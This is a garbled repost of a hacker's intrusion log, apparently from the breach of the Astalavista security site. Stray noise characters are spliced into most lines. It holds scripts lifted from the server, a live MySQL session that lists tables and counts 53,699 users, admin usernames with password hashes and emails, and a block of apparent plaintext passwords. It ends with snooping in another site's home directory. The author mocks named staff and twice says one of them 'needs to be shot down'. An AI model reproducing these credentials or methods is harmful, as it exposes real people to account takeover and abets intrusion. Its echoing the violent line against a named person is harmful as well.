) {, h1 K3 Y4 H8 j1 f $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
3 [' H. w, K# Y2 J: B<rss version=”2.0″>
0 W+ L/ O1 g4 a/ [& T <channel>* q* d1 x8 b4 b4 z, N6 M
<title>ASTALAVISTA.com - Exploits</title>
7 o$ R: P7 ^! K7 u, G% @0 \ <link>http://www.astalavista.com/exploits</link>
! T B. k2 h) C7 j. C- k+ C1 E1 } <description>All availably Exploits.</description>5 v$ X. M4 s' h) e; ^5 z
<language>en-us</language>
% C+ k v4 E- T$ j* R6 N <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
8 K, s& g& J* D8 h3 \4 v0 P4 V# \ <docs>http://blogs.law.harvard.edu/tech/rss</docs>
) F8 Y6 p u, W6 N% o S <generator>Astalavista.com</generator>, B `, l' }! b) m7 W. Z* P$ u
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘& R2 C4 q8 G. V8 X
</channel>& | t3 O& H/ Y: x( r9 A
</rss>’;
, C: p) S) N( H# m1 i( T5 }. r u# r6 [; W4 h3 _8 v9 z6 c
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
* l. o: ^0 {+ p7 z( q unlink (FULLPATH . ‘/feed/exploits.xml’);
9 U# O# n8 t u; x# n9 \$ B) j }
9 J! B) s$ O( W8 L0 \& n7 X# l7 |: B# Z$ F8 \
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);1 n3 y- R/ W; {6 n* v" X s
[snip]
0 d$ j/ F l) Y3 O5 s, ?& M8 e) i# B8 k* \$ F% p$ @' |$ O* @
sh-3.2$ cat exploits.sh8 l: F n7 e$ m0 U( Q( Y
#!/bin/sh+ `: `# C2 \ ?# P/ F: }
3 @7 b5 Z9 n9 F O5 v! c" @/ o7 f- i###########################################################) {( U$ @2 R' F1 H
# #" f6 ~# e5 ~1 B' e! _& T! [
# Title: milw0rm exploits adder #
9 C- j8 x% \6 B/ Q# }7 I- h; r# Description: Add all milw0rm exploits to the #2 O1 R. Y0 }" w# e! k$ M! h
# Astalavista.com database # b9 W/ k0 n4 [% \. B$ J( Y7 [) }
# #
% i# V0 p" L9 C z& Y# Company: Astalavista Group #
( N8 G. |: B$ l! ?, J# Author: Paulo M. Santos #3 e0 i% j6 Y6 h9 y" L# P. L) Y2 ]' X
# E-Mail: 链接标记paulo.santos@astalavista.ch #
v9 U) \% x6 O2 s! `1 n) k# #' F5 _6 c+ R3 C" x
###########################################################; A0 b# ` X4 w! f1 ]- _9 L
/ X% t: b% e* r: O
# path
: V) e9 w& i. ^- @( \this_path=/home/com/public_html/modifications/cronjobs
4 n! s$ A8 `# J: p* J- f* o3 m: p1 U) ~5 y$ Z. Y
# change directory
; U% Y, L* p8 v4 H9 ucd $this_path& L% n: T+ Y; B' ?7 T+ A H
cd tmp/2 N) v" P+ n; X! L, f( ~+ e7 `/ |7 C
, [# D; u6 T& b5 h' i2 R; ?
# delete files' X/ A7 f) r. i3 ~ h
rm -rf milw0rm.tar.* &
3 n% F1 t2 w. Z% zrm -rf milw0rm/ &1 @5 w7 S1 I, B0 `& L6 e3 f
" ?( m2 E3 b% `& k# wget milw0rm paket4 `# K, c: U$ h3 R x
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]7 s( a0 R6 D, i
3 n, T1 B# \- l$ ^# extract milw0rm paket% p* h* n! ]/ o! { K0 |5 L0 l; F
tar -xvf milw0rm.tar.bz2
6 y/ y7 s m& e" w+ q5 u) C6 F1 _
) H! x" Q9 b/ P! |( c- t8 o# change owner
2 H- M- n9 X# ?- ]5 Qchown -R com .
7 M+ h8 ^( f( Z) V$ C+ a K9 Z- ~* dchgrp -R com .& e/ N# d1 ^; S9 T
# M9 W8 B: x6 q+ y: @# execute php script
2 D# D0 u0 j5 ?# n( y* lcd $this_path, G8 @; H6 J' E2 J
php -q exploits.php( v, u: a, Y- a( [
+ F, h; I2 r6 l4 f
# delete files
0 `$ U6 v( H( vrm -rf tmp/milw0rm.tar.*( H7 S/ x2 @- V; o* g+ q) o/ d5 Z# h
rm -rf tmp/milw0rm/
; `; u3 Z4 P0 ]1 e( V2 z
6 N/ f2 Y* h# I6 `+ @& `: `) y" i9 lsh-3.2$ echo “Paulo M. Santos needs to be shot down.”2 @% Y/ |5 l' ~/ s9 {4 v
Paulo M. Santos needs to be shot down.
$ D- U T q! X1 L8 R! t* p9 t+ b$ g
mysql -u contrexxuser2 -p
% \/ G/ J& P% g0 r+ ^Enter password:
! K( e" X& q" d" _Welcome to the MySQL monitor. Commands end with ; or \g.1 j k0 j) f, F' m* [- S
Your MySQL connection id is 261694
7 [- X" g, F! O+ A2 zServer version: 5.0.45-community-log MySQL Community Edition (GPL). I* M( K+ b: \; O
$ R! T. W0 [! X
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 h d& m! j, z4 T7 S8 U- j* P
$ j7 F) V: p5 Imysql> show databases;
4 |) i, m* O1 f& g9 [0 ?: f; q+——————–+/ \1 Z, e- D( t, Q
| Database |2 j" |5 N O' K' x
+——————–+
0 Z. a( p( g$ q1 u8 B| information_schema |
. v4 P- V5 U8 L/ S, f/ v" e2 [| com_contrexx2 |
( Y7 e7 N3 U6 _; F" {" K| com_contrexx2_live |
4 L1 U' r2 u: t: W/ {: v| test |
, {: \$ ]9 q% y+——————–+; r0 N! S5 O6 w5 @; |
4 rows in set (0.00 sec)
# P* ?) a% E( q/ W! j6 d6 k8 p$ x" I0 i* e: G* ?" a
mysql> use com_contrexx2_live
: M) D9 V( e6 P7 N) U! SDatabase changed* ~2 G8 L1 ]% ]! h: k6 J
mysql> show tables;7 O- R/ C9 P7 U6 a& f3 j
+————————————————–+& E" W3 p4 P! F8 i
| Tables_in_com_contrexx2_live |
) v! D' Y" N8 t( l- q& V+————————————————–+
$ Y& }4 V- @0 R9 b$ H8 E| cc_banner_counter |
8 C: ]8 p. t- t& ` F4 }0 J) t& z# u: X| cc_search_counter |: I4 c: C8 @1 C; ~2 ]8 R
| contrexx_access_group_dynamic_ids |
) S6 v2 s8 B* Q* n9 H| contrexx_access_group_static_ids | l5 O L1 C# l8 n/ N" W5 a* W
| contrexx_access_rel_user_group |' R0 D6 y3 Z4 _( \5 _) w, F: f
| contrexx_access_settings |2 s% [, X6 i4 e# B, E& S3 A, E
| contrexx_access_user_attribute |$ n- }7 {; g' _0 f
| contrexx_access_user_attribute_name |
6 H* E, _9 j; _3 ^8 Q2 u& {| contrexx_access_user_attribute_value |
* ?7 K; z. f# T/ r; k- c| contrexx_access_user_core_attribute |
+ e+ ~8 X2 ~$ y7 ]| contrexx_access_user_groups |! U. _2 d1 d9 u, i! E% Y, R
| contrexx_access_user_mail |. ]: |6 c9 S9 `- s$ k% g1 e
| contrexx_access_user_profile |
7 P0 O0 ~1 u6 \3 E: l% g| contrexx_access_user_title |% m4 u9 d/ L4 o4 u9 x
| contrexx_access_user_validity |
" I7 G2 [* g2 f. ^( @: H; M| contrexx_access_users |
- X, w0 G7 H. G9 H' W* X, o| contrexx_backend_areas |. @* x. l0 ~3 Z4 f# A6 `2 H
| contrexx_backups |
) @6 a) I3 G& R0 || contrexx_content |2 F: ]4 T8 R* R P$ o
| contrexx_content_history |
9 u% e! a: F ~4 J( w% i( j8 q0 o| contrexx_content_logfile |5 B' X' n& S1 p6 A
| contrexx_content_navigation |
( z1 [6 j7 M! S) _ t| contrexx_content_navigation_history |- s% X. u8 Y1 ]7 N' k8 q/ `2 d
| contrexx_ids |( K6 v2 p. F \/ m a" q! x$ S: T
| contrexx_languages |
7 N1 g2 M% K1 N. W3 ^. h| contrexx_lib_country |
% t: Z/ Q" ^8 v| contrexx_log |' |5 g- `0 k, @4 n+ Q9 @" e
| contrexx_module_alias_source |+ _- S* ?# F! x7 S' C: w# x
| contrexx_module_alias_target |
* [% P" X/ R' g/ n$ ]| contrexx_module_block_blocks |
( I: C6 s* x8 w4 O6 g: ~6 g% N| contrexx_module_block_rel_lang |
4 P- G$ m% m4 U+ Z. `' [. N# ^| contrexx_module_block_rel_pages |
- a8 h% S9 |% V+ K% M; J| contrexx_module_block_settings |
! Z; Q% Q+ X, @0 ]9 j| contrexx_module_blog_categories |
' Y5 s% I% b4 D7 u. p9 \* Z; b| contrexx_module_blog_comments |
3 v0 V- {, s; v9 h. || contrexx_module_blog_message_to_category |/ | Y, W- w* n$ m5 i# O
| contrexx_module_blog_messages |, b0 ]9 H q3 s; Y; ^
| contrexx_module_blog_messages_lang | o9 s* b$ h* a9 T2 G5 g
| contrexx_module_blog_networks |4 b1 ]% L: }/ a. O
| contrexx_module_blog_networks_lang |
/ |2 |8 h1 @) ]7 T# M/ z$ @9 U| contrexx_module_blog_settings |
$ g" S6 m7 D9 ]; u+ X4 E. I7 H| contrexx_module_blog_votes |2 R6 m1 k- X; x) A8 A1 | o
| contrexx_module_calendar |
$ K" S: Y! \% @7 p| contrexx_module_calendar_access |0 D- U; Z; L% V1 c, x& M
| contrexx_module_calendar_categories |
# m# S% A& b" T: x2 j/ k8 m. i9 W| contrexx_module_calendar_form_data |
0 m% L0 D: P# e| contrexx_module_calendar_form_fields |. \8 @- ^: Y6 q2 b0 f
| contrexx_module_calendar_registrations |
9 K3 x$ y* t6 a3 r& y2 S) O| contrexx_module_calendar_settings |" h' ^' q( k. g/ w
| contrexx_module_calendar_style |, O4 C; W7 s5 f4 z) j
| contrexx_module_contact_form |
' n: i- k, _( A# H. {& V; W9 L8 R| contrexx_module_contact_form_data |
* z; e" n4 M3 T" J1 f| contrexx_module_contact_form_field |# c' C4 L! E. ^, a3 ^6 B
| contrexx_module_contact_settings |
1 u3 Y. W' i3 |/ E2 I| contrexx_module_data_categories |$ e, x# }* C: K) \$ u
| contrexx_module_data_message_to_category |
4 g2 n2 h0 [1 h" o4 d0 S| contrexx_module_data_messages |% R6 s2 ?7 Z# F# d' M
| contrexx_module_data_messages_lang |, T6 ~/ K: L) }9 w
| contrexx_module_data_placeholders |
2 }+ n' W/ W6 a$ g& o| contrexx_module_data_settings |4 Y$ v+ ?( ~% p; k. |1 T
| contrexx_module_directory_access |2 n3 z3 H) j: f) W
| contrexx_module_directory_categories |, z s( v* [7 b4 D
| contrexx_module_directory_dir |
: Y5 r' i; n z+ e: v+ r| contrexx_module_directory_inputfields |
7 p1 v$ S! }" K' c| contrexx_module_directory_levels |4 j/ {# E, m& r H
| contrexx_module_directory_mail |7 _# N8 J5 e& N9 T
| contrexx_module_directory_rel_dir_cat |6 {# J) V7 t( }1 P
| contrexx_module_directory_rel_dir_level |3 h7 K- c: W% `$ L
| contrexx_module_directory_settings |; T& z% E- W/ S0 V& p7 Z
| contrexx_module_directory_settings_google |
' @! J5 e7 {* |- j3 l$ || contrexx_module_directory_vote |
1 X2 F! v! B2 Q$ L| contrexx_module_docsys |0 ~+ \% n! F" b" y. P% |
| contrexx_module_docsys_categories |
8 L0 y/ x; U @- o. ~1 C0 a| contrexx_module_egov_configuration |
' q4 i! U; I. s5 H4 @| contrexx_module_egov_orders |
$ x- n6 ?% V* G| contrexx_module_egov_product_calendar |: a! L) f, N* [. ?+ }( `2 f6 K1 g
| contrexx_module_egov_product_fields |
; {- @% t7 b, t ]| contrexx_module_egov_products |! w% C6 r: R" m5 o; M* b/ W# U
| contrexx_module_egov_settings |) m* H. L$ d5 e6 B% j7 V8 a
| contrexx_module_exploits |
) D* J3 o& I& R: r' }+ A' [| contrexx_module_exploits_categories |
- ~* f8 r8 e. w3 C- m8 u- \| contrexx_module_feed_category |
. B! H* E2 P, X1 W# ` _| contrexx_module_feed_news |
+ o# s. ~9 z+ S" Z5 F2 r| contrexx_module_feed_newsml_association |
. {% j4 r* k- f/ k| contrexx_module_feed_newsml_categories |( N! q, w! y8 u+ K( d1 H/ M7 _
| contrexx_module_feed_newsml_documents |9 h/ F& x; Z) G9 G* `
| contrexx_module_feed_newsml_providers |
. `: J5 Z+ i" F3 X Z! ^| contrexx_module_forum_access |; C' C5 V7 e' C
| contrexx_module_forum_categories |8 M! e( a' P1 l( |
| contrexx_module_forum_categories_lang |2 `0 ` f2 a- Z, e
| contrexx_module_forum_notification |
# U" b* F- z' ]' S' U: g| contrexx_module_forum_postings |3 X3 r9 r& c, v; r" [6 G' H/ u
| contrexx_module_forum_rating |
% V& q- U- ^# d* r; c| contrexx_module_forum_settings |
1 d2 F; `; s! P, g" B| contrexx_module_forum_statistics |
* o2 w; U3 X" X| contrexx_module_gallery_categories |
. W9 h8 O2 F( i| contrexx_module_gallery_comments |
7 J- G' L8 o2 h6 y) J, p) ?| contrexx_module_gallery_language |. w. R! r( w( h% x1 r
| contrexx_module_gallery_language_pics |6 B! j% B) t7 ^2 U
| contrexx_module_gallery_pictures |
" i, u9 o- O2 X- Y3 d; M| contrexx_module_gallery_settings |) m" Z) f1 O, ?9 F
| contrexx_module_gallery_votes |
. ^+ Z+ Z: H. B0 x, E7 U; O' \| contrexx_module_guestbook |
7 u8 h' d2 V) N: j2 \ p- t1 X| contrexx_module_guestbook_settings |
+ _3 f: l6 P+ J0 s| contrexx_module_livecam |: t* e f% t( L9 B/ z! D6 K
| contrexx_module_livecam_settings |2 t8 d8 `3 ^. b$ |0 W& x' M$ R5 M
| contrexx_module_market |) K- A# e1 H" s2 M) ~# P3 W. l1 V
| contrexx_module_market_access |% G: h+ v, s" T: o) L! _5 D
| contrexx_module_market_categories |
Z r: p7 U* k9 [8 g/ }- n| contrexx_module_market_mail |" ], F( C/ ~/ X/ @: j; H* [
| contrexx_module_market_paypal |( S- ?# C# \' |; Q% J) y. V+ y; i
| contrexx_module_market_settings |# _. E* B Y( F+ e; B' K6 M
| contrexx_module_market_spez_fields |* d, }2 p6 ~) \% a: x. H
| contrexx_module_mediadir_access |- A3 Q7 Z/ D& m3 e$ K; T) E
| contrexx_module_mediadir_categories |
% D7 v8 e A7 n3 |$ o h| contrexx_module_mediadir_comments |0 w# d' M! X7 D1 t, F
| contrexx_module_mediadir_dir |( W, D7 Z* O0 H* r' e* ^- c: z
| contrexx_module_mediadir_inputfields |, O1 ?: x5 C: J
| contrexx_module_mediadir_levels |
2 |- R0 K( D& L5 Z, R0 m| contrexx_module_mediadir_mail |
# v4 ^5 w9 t- y| contrexx_module_mediadir_rel_dir_cat |
0 P) N8 S1 J: M" D' v| contrexx_module_mediadir_rel_dir_level |
7 B7 J5 c/ K% U: c2 |# Z4 R| contrexx_module_mediadir_reports |
" ]' F* U- }9 v4 n, V5 m: a| contrexx_module_mediadir_settings |$ ?/ I# ?! i/ o. `: z" p, j& U" j
| contrexx_module_mediadir_settings_google |9 z, Y) E6 l# i! Z
| contrexx_module_mediadir_vote |
" E% I0 H. f6 J+ W| contrexx_module_memberdir_directories |
( x }0 e. g& e0 \% t3 S| contrexx_module_memberdir_name |
' M$ P2 u: P6 \) ?| contrexx_module_memberdir_settings | g) k1 J8 @+ ~, e8 G
| contrexx_module_memberdir_values |+ O. @+ ]; P( x l
| contrexx_module_nettools_allowed_groups |
8 ?- N' E4 U% a) s8 U| contrexx_module_nettools_settings |7 Y$ c6 o# c9 f* L" m1 Y
| contrexx_module_news |# V! |. o! U2 x0 [8 q! @+ {
| contrexx_module_news_access |2 O, _8 R: w/ u2 }8 h4 \( b
| contrexx_module_news_categories |
1 c! Z1 P1 V& b0 S. W2 W( j| contrexx_module_news_settings |
* t5 M# \+ g3 v0 k! D/ `| contrexx_module_news_teaser_frame |" {& S& R9 x& B3 w5 v
| contrexx_module_news_teaser_frame_templates |
( Z, X9 n; T6 c- H| contrexx_module_news_ticker |
1 i j4 Q: k& U+ e| contrexx_module_newsletter |) x2 |6 d& ]& B7 _1 a
| contrexx_module_newsletter_attachment |
' y% w, c0 Z, n$ s: H2 V8 \0 T6 T| contrexx_module_newsletter_category |# g, d! q! B* O, r
| contrexx_module_newsletter_confirm_mail |
% E, c2 e3 Q* s0 S( ]3 ]| contrexx_module_newsletter_rel_cat_news |
' [- d* A3 N; K5 M" H9 u| contrexx_module_newsletter_rel_user_cat |
1 B& ~& w" ]# r% _: N+ W| contrexx_module_newsletter_settings |
% f- |& Z8 U' Y) h| contrexx_module_newsletter_template |
5 o2 x' o$ [$ R7 `9 B7 s| contrexx_module_newsletter_tmp_sending |. y5 T2 S+ N- D$ N8 J, i A% A
| contrexx_module_newsletter_user |( @4 R) j, J8 L) @8 e2 v( ]
| contrexx_module_newsletter_user_title |
6 a; x/ G1 v0 |% L+ O. P( |# x* r( A4 b- ~+ r| contrexx_module_onlinetools_defaultports |: \% V7 B/ J4 V
| contrexx_module_onlinetools_defaultports_back |1 q) c1 B0 n( I3 m; ~
| contrexx_module_onlinetools_geolitecity_blocks |
# H. N! R" F4 a3 G# k" Z| contrexx_module_onlinetools_geolitecity_country |
2 m9 H; g3 p$ R X+ y/ [8 r/ J| contrexx_module_onlinetools_geolitecity_location |
6 u% M% y+ j' Q% d) D0 A| contrexx_module_podcast_category |( g& r+ `) n+ D; c; u
| contrexx_module_podcast_medium |
o* F3 F4 Y% L s$ m2 D. x0 S! t E! o| contrexx_module_podcast_rel_category_lang |1 C" p$ t! z" J" D' X$ E6 g$ K
| contrexx_module_podcast_rel_medium_category |
9 D2 c4 C$ e3 B: x5 ^; V9 q| contrexx_module_podcast_settings |
' t- C% O8 z. t| contrexx_module_podcast_template |
1 @: f7 z: E! C, S& K& k| contrexx_module_proxydb |. h) b, Y: N9 ~1 U, P7 C
| contrexx_module_recommend |, z6 X9 G$ k: B
| contrexx_module_repository |; u7 {% B! {6 C8 O7 w# s/ X3 A
| contrexx_module_securitynews_cats |
! g8 p- L' G+ s8 a. X- w1 r| contrexx_module_securitynews_feeds |2 ^& c3 {. w1 A
| contrexx_module_securitynews_news |
3 A+ M2 V6 W; N; K" e; s| contrexx_module_shop_categories | T' y' v) ?) v5 }) g
| contrexx_module_shop_config |3 j, H0 e- Q5 G' w0 P
| contrexx_module_shop_countries |, l9 _# w4 h! \7 m
| contrexx_module_shop_currencies |& |3 x5 f" s3 D* g x
| contrexx_module_shop_customers |& }% s( }- a* G) k1 \7 O" ^, N
| contrexx_module_shop_importimg |
4 h$ Z3 O, _2 ]2 a i4 I| contrexx_module_shop_lsv |
I% r/ Z/ n. B J| contrexx_module_shop_mail |
F, p% R# R P9 \4 q| contrexx_module_shop_mail_content |
7 C5 l* l- a7 j| contrexx_module_shop_manufacturer |
! Q6 i3 B6 x9 H0 S" d& R" G| contrexx_module_shop_order_items |
! d# O9 L# R, r: G| contrexx_module_shop_order_items_attributes |1 F% X5 \% w9 ]3 t9 h T
| contrexx_module_shop_orders |
0 q& U' {: X4 Z$ u| contrexx_module_shop_payment |
$ ~ k/ a) N& q' F( x* K| contrexx_module_shop_payment_processors |; j. g5 G* b, r
| contrexx_module_shop_pricelists |
/ B# @1 f% |4 B' `% I( v# V8 e: G| contrexx_module_shop_products |; `# v- Y/ ^$ O) r \% c. \
| contrexx_module_shop_products_attributes |1 h. ~' B3 D4 t" Y" h, J2 b( W
| contrexx_module_shop_products_attributes_name |* ?. ?6 f, g4 I0 Q8 a4 u5 I
| contrexx_module_shop_products_attributes_value |
5 z6 q ^( v: t# E| contrexx_module_shop_products_downloads |
/ v5 h9 k$ ^4 x" m| contrexx_module_shop_rel_countries |; z" n% P( F, ?
| contrexx_module_shop_rel_payment |6 R4 A3 j! {0 y) M2 k8 P3 d
| contrexx_module_shop_rel_shipment |+ E( E/ q6 m8 M
| contrexx_module_shop_shipment_cost |0 w$ ^1 t7 J# D5 j: Q7 |* K" H6 B
| contrexx_module_shop_shipper |
* G. u& e( Q/ U! }, J( i! w, H| contrexx_module_shop_vat |" j+ g( R3 l. x1 V
| contrexx_module_shop_zones |, p9 f. s! X/ o }( E; d+ ~& i/ R
| contrexx_module_u2u_address_list |
& a+ j& Z$ \9 m& P% o7 N| contrexx_module_u2u_message_log |
$ _, S! Q( j9 y }. m7 _# |7 c| contrexx_module_u2u_sent_messages |, _* a& P: b. S. D/ y
| contrexx_module_u2u_settings |
7 z6 A M, B' e7 I| contrexx_module_u2u_user_log |/ L& v9 O2 A$ w% Z( l
| contrexx_modules |
9 b# m2 t; [5 l6 C) u| contrexx_sessions |" m# E8 \# V5 u8 R# n0 W
| contrexx_settings |; g6 w3 ~6 o+ M/ u' W1 S `
| contrexx_settings_smtp |
5 U) p, {2 x" y| contrexx_skins |0 C' g0 @5 U( P: Y$ S/ L- |" G
| contrexx_stats_browser |! U$ y' V% }! G. K" M
| contrexx_stats_colourdepth |: e9 L# J3 J, ]% S6 a
| contrexx_stats_config |
# f7 k2 a) `+ Z% e1 N7 A% e| contrexx_stats_country |, [: P8 O* A' s& y1 Z D: d% ?
| contrexx_stats_hostname |
1 R& s* G- G! T4 Z' a, c0 L, s) V| contrexx_stats_javascript |& l2 m& z9 _8 E Z
| contrexx_stats_operatingsystem |. X$ k0 C6 }, d
| contrexx_stats_referer |
* `* |# d/ |) X- c. K| contrexx_stats_requests |
$ V! u% j4 i$ o# \+ ?5 u| contrexx_stats_requests_summary |- i" t/ {- e8 Z, p
| contrexx_stats_screenresolution |+ ^, n# `) n. O& n# F
| contrexx_stats_search |
( H4 @ D) H5 E2 D1 O- D| contrexx_stats_spiders |
) g: t) [/ x/ ^. P0 O2 l| contrexx_stats_spiders_summary |8 H! M& E& E8 G2 N0 r
| contrexx_stats_visitors |
, B$ x; c& o7 Q( Y- ~8 N0 _1 v" [ O| contrexx_stats_visitors_summary |
6 W/ R9 B2 }2 a% M| contrexx_voting_additionaldata |9 ]- R" A9 S$ x2 \0 d- g
| contrexx_voting_email |
& ]% w* N* y" F4 ~| contrexx_voting_rel_email_system |2 g5 P Z# b2 D( O# z* m8 T
| contrexx_voting_results |/ {! i, ^+ Q6 e2 b
| contrexx_voting_system |7 c/ g" \! K1 U$ ]5 [
| foo |6 c8 ?' L: e! w" L9 \7 o, i
+————————————————–+
8 e1 G- J+ \0 v) d227 rows in set (0.01 sec)
" n. w/ F( \7 g: w( ]
4 p4 z# O: ^; Q! n& O$ J6 D( q: }, amysql> select count(*) as skids from contrexx_access_users;
! R" k4 E% g3 a( r- u7 \# @+——-+
- e2 `5 t% F/ L| skids |
( m" o2 u3 h/ @- E) m+——-+
' l( p% L% l% n1 B6 p| 53699 |
: e2 w Z2 [% W# E9 }7 u+——-+3 X1 [* Y" e" h0 ~: a& ^7 u1 ?, q3 l' `
1 row in set (0.00 sec)0 y* L. F( _" x( d6 s, j
3 I8 z" p) N3 tmysql> describe contrexx_access_users;, c8 m5 x- d1 u% ~* E0 p4 i7 \
+——————+——————————————+——+—–+————–+—————-+
: E% T; @- p' g3 @. ~+ N| Field | Type | Null | Key | Default | Extra |4 s/ A/ C- ^0 n& d
+——————+——————————————+——+—–+————–+—————-+
; H8 v# j5 m$ G6 J* V| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
/ @9 v: {3 E! c7 O, M5 E% Q% v# r9 y| is_admin | tinyint(1) unsigned | NO | | 0 | |
9 v! h$ G {/ d: {( U0 k' t| username | varchar(40) | YES | MUL | NULL | |
' j& @/ N) Y1 [: X f- C* x| password | varchar(32) | YES | | NULL | |
m8 A/ [: r1 ?| regdate | int(14) unsigned | NO | | 0 | |
3 ~6 Z0 O$ l! V. |7 p| expiration | int(14) unsigned | NO | | 0 | |
; g" r' j8 j) ?! g| validity | int(10) unsigned | NO | | 0 | |. M& ~" _0 v( B+ ^
| last_auth | int(14) unsigned | NO | | 0 | |3 j2 K& R0 \; M N
| last_activity | int(14) unsigned | NO | | 0 | |* `3 Q0 j& T% N( B8 T" z8 w! w
| email | varchar(255) | YES | | NULL | |" U+ g, j- k0 L' s5 a% l% \+ \+ \: n
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
1 H0 i" S" d& O$ W| frontend_lang_id | int(2) unsigned | NO | | 0 | |8 ^( I$ V9 _9 l' w$ M; v9 _
| backend_lang_id | int(2) unsigned | NO | | 0 | |3 c! P% u" n4 k Q0 o J# B! e
| active | tinyint(1) | NO | | 0 | |
2 e+ {. C- I5 j' }/ I7 k% q| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
5 i" @' e5 \$ ^| restore_key | varchar(32) | NO | | | |
" m8 c# C* \7 N' g$ ^, G3 ~7 y| restore_key_time | int(14) unsigned | NO | | 0 | |
" s# A; G+ a9 ?8 T| u2u_active | enum(’0′,’1′) | NO | | 1 | |
; x3 V0 H, U% ^( b: G8 E& [6 z, e+——————+——————————————+——+—–+————–+—————-+
/ K& d. C8 P) P: I" [5 e18 rows in set (0.00 sec)) E! n& ^; P$ C' u7 ?. h
9 z6 g8 c+ l, r2 U0 [: p
mysql> select username,password,email from contrexx_access_users where is_admin = 1;6 K5 J$ ?4 F/ \: o m8 {) \6 Y* @
+————+———————————-+—————————–+2 Z6 L! ^) M: [# B+ e) E
| username | password | email |0 ^$ C7 X1 o5 _2 R# }* a. l o
+————+———————————-+—————————–+' ?% E! w, o& x) k5 g
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |/ t( j% |2 ?" |# `( c% V
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |8 |- b6 }# x+ v) T: x5 Q, C0 N
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch | b$ d) P; `; z# b3 |, U
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |/ ?9 V% k/ ?$ R X6 U+ e" p
+————+———————————-+—————————–+
: F# s! ?9 x7 ~/ m4 rows in set (0.04 sec)
7 s/ x# f3 w% M; ]
" a1 z4 Q/ m! \/ K9 H- n& Q! m5 _mysql> exit;
4 O2 r$ N8 Q8 \ z( W. \Bye
7 n) p9 _8 k& V
2 _: @8 Z3 d% b7 L) R! Q2 m& E[~] There you go, your “team of security and IT professionals” is a joke.2 \* `9 t( ~/ u
% A) i1 [ r+ i3 e4 h8 s' q' t+——————————+
- |$ X* q, L! ? t Msystem:f82BN3+_*' z6 h c! V9 T0 ~ K4 _
Be1er0ph0r:belerophor4astacom
- R& I- \+ E5 }1 Vprozac:asta4cms!. V' X" E% o# n+ v6 u
commander:mpbdaagf6m
, } h# b, Z0 `8 Xsykadul:ak29eral
+ H- }+ e# ~$ c+——————————+( F8 p; T/ b1 x" y+ L
( t- F: @& u3 W8 F$ x5 l[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
, \4 V- A D1 t# g…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.0 |, A1 l( f0 W* E
% P& s& n# q4 Q7 t+ W5 k
[~] Lets move to astalavista.net now,
S' _3 m. c4 w, `, B9 t# i
T, B# ]- g$ W9 v9 y9 V& B6 mFrom <链接标记[url]https://www.astalavista.net/[/url]>:
9 d9 v0 n- m- E- b* \. o _>> Everyone knows that the best defense is a good offense.
0 f% P, |, p/ u5 I, {2 a: {) G/ M' v>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.+ {6 ^( C8 G' t0 C# p, v
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
# Y2 F( q- b2 o8 D. x3 R>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”/ L% R5 S8 d0 d$ u3 Z% d* }
2 \5 \% L7 \2 U
>> Go ahead, try and hack our server . in a completely legal way!' B" `) O, O& s' c7 Y4 c
>> Learn by doing: We offer our members tricky tasks and challenges on an- N% ?: {* C# a3 R- W; V+ i
>> ongoing basis so you can test your knowledge and abilities. You can also
?$ A1 d/ p6 S+ N/ Y>> demonstrate what you.ve mastered by taking part in regular hacker contests
% Q: `5 u) v8 Z3 P>> and war games
. `4 x' D) z6 T4 ~; K0 R0 {
; k7 v( D- u+ S! }, b4 M[~] Lets take a look there, after all… they are hack-proof, aren’t they?!* X9 n- X! ^7 ~. y k+ G' z1 @$ r
& y- o( i" C6 F
[-] Tricky task: Find home dir of astalavista.net
- C3 K @( b0 f4 P, Q. i
* o4 o0 {' U* t: _2 t) ?7 o2 Dsh-3.2$ ls -la ~astanet8 p3 W/ M+ z, c
total 48% Z. e' \- h$ s
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
* g& o4 Y' l% u0 z' P* Q; n3 qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 T) K' {. Z: w$ hdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth1 y3 d0 ~1 g% Q5 d% o
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
% `. l7 h1 l/ \; l3 Q-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
, o- G+ @1 m7 e1 A9 @& h-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile5 h" \& z. r/ f6 \6 V
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc' W$ H5 K8 g' D
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains# c- g' V. I* o/ L ]% Y
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap5 J. n/ e; n C7 W6 r' O3 M
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
5 v2 \6 s" p& l3 f( h/ E, ?lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html# u6 C4 l5 m, u' x
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow, Y. X q+ {* J7 ?" L; C+ C1 Y; h' a
2 M! h8 n# i. O4 Q- I5 ksh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
